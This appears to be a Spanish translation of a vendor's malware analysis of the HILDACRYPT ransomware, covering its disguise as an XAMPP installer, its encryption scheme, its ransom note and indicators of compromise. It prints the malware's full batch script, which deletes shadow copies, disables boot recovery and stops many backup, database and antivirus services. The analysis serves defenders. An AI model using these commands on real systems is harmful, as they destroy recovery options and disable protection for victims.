{"id":52277,"date":"2019-11-05T00:00:00","date_gmt":"2019-11-04T21:00:00","guid":{"rendered":"https:\/\/prohoster.info\/blog\/blog_prohoster\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam"},"modified":"2020-02-18T13:59:57","modified_gmt":"2020-02-18T10:59:57","slug":"hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","status":"publish","type":"post","link":"https:\/\/prohoster.info\/es\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","title":{"rendered":"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>\u00a1Hola, Habr! Una vez m\u00e1s, nos complace informar sobre las nuevas versiones del software malicioso de la categor\u00eda Ransomware. HILDACRYPT es un nuevo programa de ransomware, miembro de la familia Hilda, descubierta en agosto de 2019 y nombrada en honor a la serie animada de Netflix que se utiliz\u00f3 para propagaci\u00f3n del software. Hoy exploramos las caracter\u00edsticas t\u00e9cnicas de este virus de ransomware actualizado.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/b42870531485dd30670e35e6a5e5125f.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><br \/>\nEn la primera versi\u00f3n de los ransomware Hilda, hab\u00eda un enlace al <noindex><a rel=\"nofollow\" href=\"https:\/\/www.youtube.com\/watch?v=XCojP2Ubuto\">tr\u00e1iler<\/a><\/noindex> de la serie animada en el mensaje de rescate. HILDACRYPT se disfraza como un instalador leg\u00edtimo de XAMPP, un distribuidor f\u00e1cil de instalar de Apache que incluye MariaDB, PHP y Perl. Adem\u00e1s, el nombre del archivo del criptor es diferente: xamp. Tambi\u00e9n, el archivo del programa de ransomware no tiene firma electr\u00f3nica.<\/p>\n<h3>An\u00e1lisis est\u00e1tico<\/h3>\n<p>\nEl programa de ransomware est\u00e1 contenido en un archivo PE32 .NET, escrito para MS Windows. Su tama\u00f1o es de 135,168 bytes. Tanto el c\u00f3digo del programa principal como el c\u00f3digo del programa protector est\u00e1n escritos en C#. Seg\u00fan la marca de fecha y hora de compilaci\u00f3n, el archivo binario fue creado el 14 de septiembre de 2019.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/9b04f91f5f56ad0ff981bb2a944fa848.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nSeg\u00fan Detect It Easy, el virus de ransomware est\u00e1 comprimido utilizando Confuser y ConfuserEx, pero estos ofuscadores son los mismos que antes; solo que ConfuserEx es el sucesor de Confuser, por lo que las firmas de su c\u00f3digo son similares. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/ce65d4db560ea7d62ef228378ab207e6.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nHILDACRYPT est\u00e1 realmente empaquetado usando ConfuserEx. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/eee308f9f6080b616c08e2f6709245d8.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nSHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a<\/p>\n<h3>Vector de ataque<\/h3>\n<p>\nLo m\u00e1s probable es que el programa de ransomware se detectara en uno de los sitios dedicados a la programaci\u00f3n web, disfraz\u00e1ndose como un programa leg\u00edtimo de XAMPP.<\/p>\n<p>Toda la cadena de infecci\u00f3n se puede ver en <noindex><a rel=\"nofollow\" href=\"https:\/\/app.any.run\/tasks\/abe20240-2f3c-40cf-b5dd-4f0088ab1c5a\/\">app.any.run sandbox<\/a><\/noindex>.<\/p>\n<h3>Ofuscaci\u00f3n <\/h3>\n<p>\nLas l\u00edneas del programa de ransomware se almacenan encriptadas. Al iniciar HILDACRYPT, las descifra usando Base64 y AES-256-CBC.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/9e2a478ba19480308dcff887c2353e18.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h3>Instalaci\u00f3n<\/h3>\n<p>\nPrimero, el programa de ransomware crea en %AppDataRoaming% una carpeta, cuyo identificador GUID (Identificador \u00danico Global) se genera aleatoriamente. Al agregar un archivo bat en esta ubicaci\u00f3n, el virus de ransomware lo ejecuta con cmd.exe:<\/p>\n<p><i>cmd.exe \/c  JKfgkgj3hjgfhjka.bat  &amp; exit<br \/>\n<\/i><br \/>\n<img decoding=\"async\" alt=\"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/5319151b3f57af2394e6031f4cd1bcd6.jpg\" style=\"display:block;margin: 0 auto;\" \/><img decoding=\"async\" alt=\"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/c0c749619f3f9a240e362f5effb5ea2e.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\nLuego comienza la ejecuci\u00f3n de un script por lotes para desactivar funciones o servicios del sistema.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/ecea9735d151835ddeeb62986b325399.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nEl script contiene una larga lista de comandos que eliminan las copias de sombra, desactivan el servidor SQL, las soluciones de copia de seguridad y el antivirus.<\/p>\n<p>Por ejemplo, intenta sin \u00e9xito detener los servicios de copia de seguridad de Acronis Backup. Adem\u00e1s, ataca los sistemas de copia de seguridad y las soluciones antivirus de los siguientes proveedores: Veeam, Sophos, Kaspersky, McAfee y otros.<\/p>\n<pre><code class=\"plaintext\">@echo off\n:: No soy realmente fan de los ponis, las chicas de dibujos animados son mejores, \u00bfno crees?\nvssadmin resize shadowstorage \/for=c: \/on=c: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=c: \/on=c: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=d: \/on=d: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=d: \/on=d: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=e: \/on=e: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=e: \/on=e: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=f: \/on=f: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=f: \/on=f: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=g: \/on=g: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=g: \/on=g: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=h: \/on=h: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=h: \/on=h: \/maxsize=unbounded\nbcdedit \/set {default} recoveryenabled No\nbcdedit \/set {default} bootstatuspolicy ignoreallfailures\nvssadmin Delete Shadows \/all \/quiet\nnet stop SQLAgent$SYSTEM_BGC \/y\nnet stop \u201cSophos Device Control Service\u201d \/y\nnet stop macmnsvc \/y\nnet stop SQLAgent$ECWDB2 \/y\nnet stop \u201cZoolz 2 Service\u201d \/y\nnet stop McTaskManager \/y\nnet stop \u201cSophos AutoUpdate Service\u201d \/y\nnet stop \u201cSophos System Protection Service\u201d \/y\nnet stop EraserSvc11710 \/y\nnet stop PDVFSService \/y\nnet stop SQLAgent$PROFXENGAGEMENT \/y\nnet stop SAVService \/y\nnet stop MSSQLFDLauncher$TPSAMA \/y\nnet stop EPSecurityService \/y\nnet stop SQLAgent$SOPHOS \/y\nnet stop \u201cSymantec System Recovery\u201d \/y\nnet stop Antivirus \/y\nnet stop SstpSvc \/y\nnet stop MSOLAP$SQL_2008 \/y\nnet stop TrueKeyServiceHelper \/y\nnet stop sacsvr \/y\nnet stop VeeamNFSSvc \/y\nnet stop FA_Scheduler \/y\nnet stop SAVAdminService \/y\nnet stop EPUpdateService \/y\nnet stop VeeamTransportSvc \/y\nnet stop \u201cSophos Health Service\u201d \/y\nnet stop bedbg \/y\nnet stop MSSQLSERVER \/y\nnet stop KAVFS \/y\nnet stop Smcinst \/y\nnet stop MSSQLServerADHelper100 \/y\nnet stop TmCCSF \/y\nnet stop wbengine \/y\nnet stop SQLWriter \/y\nnet stop MSSQLFDLauncher$TPS \/y\nnet stop SmcService \/y\nnet stop ReportServer$TPSAMA \/y\nnet stop swi_update \/y\nnet stop AcrSch2Svc \/y\nnet stop MSSQL$SYSTEM_BGC \/y\nnet stop VeeamBrokerSvc \/y\nnet stop MSSQLFDLauncher$PROFXENGAGEMENT \/y\nnet stop VeeamDeploymentService \/y\nnet stop SQLAgent$TPS \/y\nnet stop DCAgent \/y\nnet stop \u201cSophos Message Router\u201d \/y\nnet stop MSSQLFDLauncher$SBSMONITORING \/y\nnet stop wbengine \/y\nnet stop MySQL80 \/y\nnet stop MSOLAP$SYSTEM_BGC \/y\nnet stop ReportServer$TPS \/y\nnet stop MSSQL$ECWDB2 \/y\nnet stop SntpService \/y\nnet stop SQLSERVERAGENT \/y\nnet stop BackupExecManagementService \/y\nnet stop SMTPSvc \/y\nnet stop mfefire \/y\nnet stop BackupExecRPCService \/y\nnet stop MSSQL$VEEAMSQL2008R2 \/y\nnet stop klnagent \/y\nnet stop MSExchangeSA \/y\nnet stop MSSQLServerADHelper \/y\nnet stop SQLTELEMETRY \/y\nnet stop \u201cSophos Clean Service\u201d \/y\nnet stop swi_update_64 \/y\nnet stop \u201cSophos Web Control Service\u201d \/y\nnet stop EhttpSrv \/y\nnet stop POP3Svc \/y\nnet stop MSOLAP$TPSAMA \/y\nnet stop McAfeeEngineService \/y\nnet stop \u201cVeeam Backup Catalog Data Service\u201d \/\nnet stop MSSQL$SBSMONITORING \/y\nnet stop ReportServer$SYSTEM_BGC \/y\nnet stop AcronisAgent \/y\nnet stop KAVFSGT \/y\nnet stop BackupExecDeviceMediaService \/y\nnet stop MySQL57 \/y\nnet stop McAfeeFrameworkMcAfeeFramework \/y\nnet stop TrueKey \/y\nnet stop VeeamMountSvc \/y\nnet stop MsDtsServer110 \/y\nnet stop SQLAgent$BKUPEXEC \/y\nnet stop UI0Detect \/y\nnet stop ReportServer \/y\nnet stop SQLTELEMETRY$ECWDB2 \/y\nnet stop MSSQLFDLauncher$SYSTEM_BGC \/y\nnet stop MSSQL$BKUPEXEC \/y\nnet stop SQLAgent$PRACTTICEBGC \/y\nnet stop MSExchangeSRS \/y\nnet stop SQLAgent$VEEAMSQL2008R2 \/y\nnet stop McShield \/y\nnet stop SepMasterService \/y\nnet stop \u201cSophos MCS Client\u201d \/y\nnet stop VeeamCatalogSvc \/y\nnet stop SQLAgent$SHAREPOINT \/y\nnet stop NetMsmqActivator \/y\nnet stop kavfsslp \/y\nnet stop tmlisten \/y\nnet stop ShMonitor \/y\nnet stop MsDtsServer \/y\nnet stop SQLAgent$SQL_2008 \/y\nnet stop SDRSVC \/y\nnet stop IISAdmin \/y\nnet stop SQLAgent$PRACTTICEMGT \/y\nnet stop BackupExecJobEngine \/y\nnet stop SQLAgent$VEEAMSQL2008R2 \/y\nnet stop BackupExecAgentBrowser \/y\nnet stop VeeamHvIntegrationSvc \/y\nnet stop masvc \/y\nnet stop W3Svc \/y\nnet stop \u201cSQLsafe Backup Service\u201d \/y\nnet stop SQLAgent$CXDB \/y\nnet stop SQLBrowser \/y\nnet stop MSSQLFDLauncher$SQL_2008 \/y\nnet stop VeeamBackupSvc \/y\nnet stop \u201cSophos Safestore Service\u201d \/y\nnet stop svcGenericHost \/y\nnet stop ntrtscan \/y\nnet stop SQLAgent$VEEAMSQL2012 \/y\nnet stop MSExchangeMGMT \/y\nnet stop SamSs \/y\nnet stop MSExchangeES \/y\nnet stop MBAMService \/y\nnet stop EsgShKernel \/y\nnet stop ESHASRV \/y\nnet stop MSSQL$TPSAMA \/y\nnet stop SQLAgent$CITRIX_METAFRAME \/y\nnet stop VeeamCloudSvc \/y\nnet stop \u201cSophos File Scanner Service\u201d \/y\nnet stop \u201cSophos Agent\u201d \/y\nnet stop MBEndpointAgent \/y\nnet stop swi_service \/y\nnet stop MSSQL$PRACTICEMGT \/y\nnet stop SQLAgent$TPSAMA \/y\nnet stop McAfeeFramework \/y\nnet stop \u201cEnterprise Client Service\u201d \/y\nnet stop SQLAgent$SBSMONITORING \/y\nnet stop MSSQL$VEEAMSQL2012 \/y\nnet stop swi_filter \/y\nnet stop SQLSafeOLRService \/y\nnet stop BackupExecVSSProvider \/y\nnet stop VeeamEnterpriseManagerSvc \/y\nnet stop SQLAgent$SQLEXPRESS \/y\nnet stop OracleClientCache80 \/y\nnet stop MSSQL$PROFXENGAGEMENT \/y\nnet stop IMAP4Svc \/y\nnet stop ARSM \/y\nnet stop MSExchangeIS \/y\nnet stop AVP \/y\nnet stop MSSQLFDLauncher \/y\nnet stop MSExchangeMTA \/y\nnet stop TrueKeyScheduler \/y\nnet stop MSSQL$SOPHOS \/y\nnet stop \u201cSQL Backups\u201d \/y\nnet stop MSSQL$TPS \/y\nnet stop mfemms \/y\nnet stop MsDtsServer100 \/y\nnet stop MSSQL$SHAREPOINT \/y\nnet stop WRSVC \/y\nnet stop mfevtp \/y\nnet stop msftesql$PROD \/y\nnet stop mozyprobackup \/y\nnet stop MSSQL$SQL_2008 \/y\nnet stop SNAC \/y\nnet stop ReportServer$SQL_2008 \/y\nnet stop BackupExecAgentAccelerator \/y\nnet stop MSSQL$SQLEXPRESS \/y\nnet stop MSSQL$PRACTTICEBGC \/y\nnet stop VeeamRESTSvc \/y\nnet stop sophossps \/y\nnet stop ekrn \/y\nnet stop MMS \/y\nnet stop \u201cSophos MCS Agent\u201d \/y\nnet stop RESvc \/y\nnet stop \u201cAcronis VSS Provider\u201d \/y\nnet stop MSSQL$VEEAMSQL2008R2 \/y\nnet stop MSSQLFDLauncher$SHAREPOINT \/y\nnet stop \u201cSQLsafe Filter Service\u201d \/y\nnet stop MSSQL$PROD \/y\nnet stop SQLAgent$PROD \/y\nnet stop MSOLAP$TPS \/y\nnet stop VeeamDeploySvc \/y\nnet stop MSSQLServerOLAPService \/y\ndel %0\n<\/code><\/pre>\n<p>\nDespu\u00e9s de que los servicios y procesos mencionados anteriormente han sido desactivados, el criptolocker recopila informaci\u00f3n sobre todos los procesos en ejecuci\u00f3n utilizando el comando tasklist para asegurarse de que todos los servicios necesarios est\u00e9n inactivos. <br \/>\n<i>tasklist v \/fo csv<\/i><\/p>\n<p>Este comando produce una lista detallada de los procesos en ejecuci\u00f3n, cuyos elementos est\u00e1n separados por comas. <br \/>\n<i>\u00abcsrss.exe\u00bb,\u00ab448\u00bb,\u00abservicios\u00bb,\u00ab0\u00bb,\u00ab1\u00a0896\u00a0\u00a0\u00bb,\u00abdesconocido\u00bb,\u00bb\/\u00bb\u00bb,\u00ab0:00:03\u00bb,\u00bb\/\u00bb\u00bb<br \/>\n<\/i><\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/b16a8f52dba47ace2ca99d120f4f9b01.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nTras esta verificaci\u00f3n, el ransomware inicia el proceso de cifrado. <\/p>\n<h3>Cifrado <br \/>\n<\/h3>\n<h4>Cifrado de archivos<\/h4>\n<p>\nHILDACRYPT recorre todo el contenido encontrado en los discos duros, excepto las carpetas Recycle.Bin y Reference AssembliesMicrosoft. En esta \u00faltima se encuentran archivos dll, pdb, y otros cr\u00edticos para aplicaciones .Net, que pueden afectar al funcionamiento del ransomware. Para encontrar los archivos que se cifrar\u00e1n, se utiliza la siguiente lista de extensiones:<\/p>\n<p><i>&#171;.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md&#187;<br \/>\n<\/i><br \/>\nPara cifrar los archivos del usuario, el ransomware utiliza el algoritmo AES-256-CBC. El tama\u00f1o de la clave es de 256 bits y el tama\u00f1o del vector de inicializaci\u00f3n (IV) es de 16 bytes. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/7c1a57562a3f8ada074639fbab35429d.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nEn la siguiente captura de pantalla, los valores byte_2 y byte_1 se obtuvieron aleatoriamente utilizando GetBytes(). <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/fcd506b4ebf6ccb056b69ccc7249641a.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nClave<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/9af5398ae995176297743fbd94054d6d.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nVI<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/e6626bce140fdfca6bb989602b959786.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nEl archivo cifrado tiene la extensi\u00f3n HCY!.. Este es un ejemplo de un archivo cifrado. Para este archivo se generaron la clave y el IV mencionados anteriormente. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/f6d659bfe8a8217457e06fed916a4f2d.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h4>Cifrado de claves<\/h4>\n<p>\nEl cryptolocker guarda la clave AES generada en el archivo cifrado. La primera parte del archivo cifrado contiene un encabezado que incluye datos como HILDACRYPT, KEY, IV, FileLen en formato XML, y se ve de la siguiente manera:<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/e0d887d87b06346da88104c2d60940b8.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nEl cifrado de la clave AES y del IV se realiza utilizando RSA-2048, y la codificaci\u00f3n se lleva a cabo con Base64. La clave p\u00fablica RSA se almacena en el cuerpo del cryptolocker dentro de una de las cadenas cifradas en formato XML.<\/p>\n<p><code>28guEbzkzciKg3N\/ExUq8jGcshuMSCmoFsh\/3LoMyWzPrnfHGhrgotuY\/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u\/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5\/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8\/qfjMtZ41sIIIEyajVKfA18OT72\/UBME2gsAM\/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa\/jQ==AQAB<br \/>\n<\/code><\/p>\n<p>Para cifrar la clave AES del archivo se utiliza la clave p\u00fablica RSA. La clave p\u00fablica RSA est\u00e1 codificada en Base64 y consta de un m\u00f3dulo y un exponente p\u00fablico de 65537. Se requiere la clave RSA privada para la descifrado, que posee el atacante.<\/p>\n<p>Despu\u00e9s del cifrado RSA, la clave AES se codifica con Base64, que se guarda en el archivo cifrado.<\/p>\n<h3>Mensaje de rescate<\/h3>\n<p>\nAl finalizar el cifrado, HILDACRYPT guarda un archivo html en la carpeta donde cifr\u00f3 los archivos. La notificaci\u00f3n del ransomware incluye dos direcciones de correo electr\u00f3nico a las que la v\u00edctima puede contactar al atacante.<\/p>\n<ul>\n<li><i>hildalolilovesyou@airmail.cc<\/i><br \/>\n hildalolilovesyou@memeware.net\n<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"HILDACRYPT: un nuevo ransomware ataca a los sistemas de copia de seguridad y soluciones antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/9996e9a6741ac3b8c423374c83924a91.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nLa notificaci\u00f3n del ransomware tambi\u00e9n contiene la l\u00ednea \u00abNo loli is safe;)\u00bb \u2014 \u00abNinguna loli est\u00e1 a salvo;)\u00bb, en referencia a personajes de anime y manga de aspecto infantil prohibidos en Jap\u00f3n.<\/p>\n<h3>Salida<\/h3>\n<p>\nHILDACRYPT, una nueva familia de ransomware, ha lanzado una nueva versi\u00f3n. El modelo de cifrado impide que la v\u00edctima descifre los archivos cifrados por el ransomware. El cryptolocker utiliza m\u00e9todos de protecci\u00f3n activa para desactivar los servicios de protecci\u00f3n relacionados con sistemas de respaldo y soluciones antivirus. El autor de HILDACRYPT es un fan\u00e1tico de la serie animada Hilda, que se muestra a trav\u00e9s de Netflix, y el enlace al tr\u00e1iler de la versi\u00f3n anterior se incluy\u00f3 en la carta de rescate. <\/p>\n<p>Como de costumbre, <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/business\/backup\/\">Acronis Backup<\/a><\/noindex> y <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/personal\/computer-backup\/\">Acronis True Image<\/a><\/noindex> pueden proteger su computadora contra el ransomware HILDACRYPT, y los proveedores tienen la capacidad de proteger a sus clientes mediante <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/cloud\/service-provider\/backup\/\">Acronis Backup Cloud<\/a><\/noindex>. La protecci\u00f3n se garantiza gracias a que estas soluciones <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/cyber-protection\/\">de ciberseguridad<\/a><\/noindex> incluyen no solo el respaldo, sino tambi\u00e9n nuestro sistema integrado de protecci\u00f3n <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/ransomware-protection\/\">Acronis Active Protection<\/a><\/noindex> \u2014 una tecnolog\u00eda reforzada por modelos de aprendizaje autom\u00e1tico y basada en heur\u00edsticas de comportamiento que, como ninguna otra, es capaz de resistir las amenazas de ransomware de d\u00eda cero.<\/p>\n<h3>Indicadores de compromiso<\/h3>\n<p>\nExtensi\u00f3n de archivo HCY!<br \/>\nHILDACRYPTReadMe.html<br \/>\nxamp.exe con una letra \u00abp\u00bb y sin firma digital<br \/>\nSHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a<br \/>\n<br \/>Fuente: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/company\/acronis\/blog\/474048\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware. HILDACRYPT \u2014 \u044d\u0442\u043e \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 2019 \u0433\u043e\u0434\u0430 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432\u0430 Hilda, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0432 \u0447\u0435\u0441\u0442\u044c \u043c\u0443\u043b\u044c\u0442\u0444\u0438\u043b\u044c\u043c\u0430 \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433\u043e\u0432\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0438\u0441\u0430 Netflix, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u041f\u041e. \u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u044b \u0437\u043d\u0430\u043a\u043e\u043c\u0438\u043c\u0441\u044f \u0441 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044f\u043c\u0438 \u0440\u0430\u0431\u043e\u0442\u044b \u044d\u0442\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u0438\u0440\u0443\u0441\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044f. \u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 Hilda 